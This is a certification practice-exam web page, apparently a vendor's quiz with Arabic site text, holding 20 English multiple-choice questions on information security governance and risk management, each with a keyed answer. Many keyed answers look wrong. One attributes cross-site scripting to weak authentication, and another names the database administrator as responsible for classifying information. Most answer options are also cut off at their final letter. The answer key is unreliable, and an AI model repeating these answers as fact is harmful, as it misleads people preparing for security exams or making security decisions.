لا تريد أن تفوت شيئا؟

نصائح اجتياز امتحان الشهادة

آخر أخبار الامتحانات ومعلومات الخصم

برعاية وحديثة من قبل خبرائنا

نعم، أرسل لي النشرة الإخبارية

خذ اختبارات أخرى عبر الإنترنت
السؤال #1
A common concern with poorly written web applications is that they can allow an attacker to:
A. gain control through a buffer overflo
B. conduct a distributed denial of service (DoS) attac
C. abuse a race conditio
D. inject structured query language (SQL) statement
عرض الإجابة
اجابة صحيحة: D
السؤال #2
A global financial institution has decided not to take any further action on a denial of service (DoS) risk found by the risk assessment team. The MOST likely reason they made this decision is that:
A. there are sufficient safeguards in place to prevent this risk from happenin
B. the needed countermeasure is too complicated to deplo
C. the cost of countermeasure outweighs the value of the asset and potential los
D. The likelihood of the risk occurring is unknow
عرض الإجابة
اجابة صحيحة: A
السؤال #3
Which of the following is MOST important for a successful information security program?
A. Adequate training on emerging security technologies
B. Open communication with key process owners
C. Adequate policies, standards and procedures
D. Executive management commitment
عرض الإجابة
اجابة صحيحة: A
السؤال #4
After completing a full IT risk assessment, who can BEST decide which mitigating controls should be implemented?
A. Senior management
B. Business manager
C. IT audit manager
D. Information security officer (ISO)
عرض الإجابة
اجابة صحيحة: A
السؤال #5
When performing a risk assessment, the MOST important consideration is that:
A. management supports risk mitigation effort
B. annual loss expectations (ALEs) have been calculated for critical asset
C. assets have been identified and appropriately value
D. attack motives, means and opportunities be understoo
عرض الإجابة
اجابة صحيحة: B
السؤال #6
An internal audit has identified major weaknesses over IT processing. Which of the following should an information security manager use to BEST convey a sense of urgency to management?
A. Security metrics reports
B. Risk assessment reports
C. Business impact analysis (BIA)
D. Return on security investment report
عرض الإجابة
اجابة صحيحة: C
السؤال #7
Attackers who exploit cross-site scripting vulnerabilities take advantage of:
A. a lack of proper input validation control
B. weak authentication controls in the web application laye
C. flawed cryptographic secure sockets layer (SSL) implementations and short key length
D. implicit web application trust relationship
عرض الإجابة
اجابة صحيحة: B
السؤال #8
The organization has decided to outsource the majority of the IT department with a vendor that is hosting servers in a foreign country. Of the following, which is the MOST critical security consideration?
A. Laws and regulations of the country of origin may not be enforceable in the foreign countr
B. A security breach notification might get delayed due to the time differenc
C. Additional network intrusion detection sensors should be installed, resulting in an additional cos
D. The company could lose physical control over the server and be unable to monitor the physical security posture of the server
عرض الإجابة
اجابة صحيحة: C
السؤال #9
When implementing effective security governance within the requirements of the company's security strategy, which of the following is the MOST important factor to consider?
A. Preserving the confidentiality of sensitive data
B. Establishing international security standards for data sharing
C. Adhering to corporate privacy standards
D. Establishing system manager responsibility for information security
عرض الإجابة
اجابة صحيحة: B
السؤال #10
Which of the following is the MOST important prerequisite for establishing information security management within an organization?
A. Senior management commitment
B. Information security framework
C. Information security organizational structure
D. Information security policy
عرض الإجابة
اجابة صحيحة: A
السؤال #11
One way to determine control effectiveness is by determining:
A. whether it is preventive, detective or compensator
B. the capability of providing notification of failur
C. the test results of intended objective
D. the evaluation and analysis of reliabilit
عرض الإجابة
اجابة صحيحة: B
السؤال #12
The MOST complete business case for security solutions is one that.
A. includes appropriate justificatio
B. explains the current risk profil
C. details regulatory requirement
D. identifies incidents and losse
عرض الإجابة
اجابة صحيحة: B
السؤال #13
When a user employs a client-side digital certificate to authenticate to a web server through Secure Socket Layer (SSI.), confidentiality is MOST vulnerable to which of the following?
A. IP spoofing
B. Man-in-the-middle attack
C. Repudiation
D. Trojan
عرض الإجابة
اجابة صحيحة: B
السؤال #14
Who in an organization has the responsibility for classifying information?
A. Data custodian
B. Database administrator
C. Information security officer
D. Data owner
عرض الإجابة
اجابة صحيحة: B
السؤال #15
When performing an information risk analysis, an information security manager should FIRST:
A. establish the ownership of asset
B. evaluate the risks to the asset
C. take an asset inventor
D. categorize the asset
عرض الإجابة
اجابة صحيحة: B
السؤال #16
The FIRST step to create an internal culture that focuses on information security is to:
A. implement stronger control
B. conduct periodic awareness trainin
C. actively monitor operation
D. gain the endorsement of executive managemen
عرض الإجابة
اجابة صحيحة: D
السؤال #17
Which of the following would be of GREATEST importance to the security manager in determining whether to accept residual risk?
A. Historical cost of the asset
B. Acceptable level of potential business impacts
C. Cost versus benefit of additional mitigating controls
D. Annualized loss expectancy (ALE)
عرض الإجابة
اجابة صحيحة: A
السؤال #18
Investments in information security technologies should be based on:
A. vulnerability assessment
B. value analysi
C. business climat
D. audit recommendation
عرض الإجابة
اجابة صحيحة: A
السؤال #19
The decision as to whether a risk has been reduced to an acceptable level should be determined by:
A. organizational requirement
B. information systems requirement
C. information security requirement
D. international standard
عرض الإجابة
اجابة صحيحة: B
السؤال #20
When an organization is setting up a relationship with a third-party IT service provider, which of the following is one of the MOST important topics to include in the contract from a security standpoint?
A. Compliance with international security standard
B. Use of a two-factor authentication syste
C. Existence of an alternate hot site in case of business disruptio
D. Compliance with the organization's information security requirement
عرض الإجابة
اجابة صحيحة: C

عرض الإجابات بعد التقديم

يرجى إرسال البريد الإلكتروني الخاص بك والواتس اب للحصول على إجابات الأسئلة.

ملحوظة: يرجى التأكد من صلاحية معرف البريد الإلكتروني وWhatsApp حتى تتمكن من الحصول على نتائج الاختبار الصحيحة.

بريد إلكتروني:
رقم الواتس اب/الهاتف:


Copyright © 2024. Designer by SPOTO Official Website. All Rights Reserved.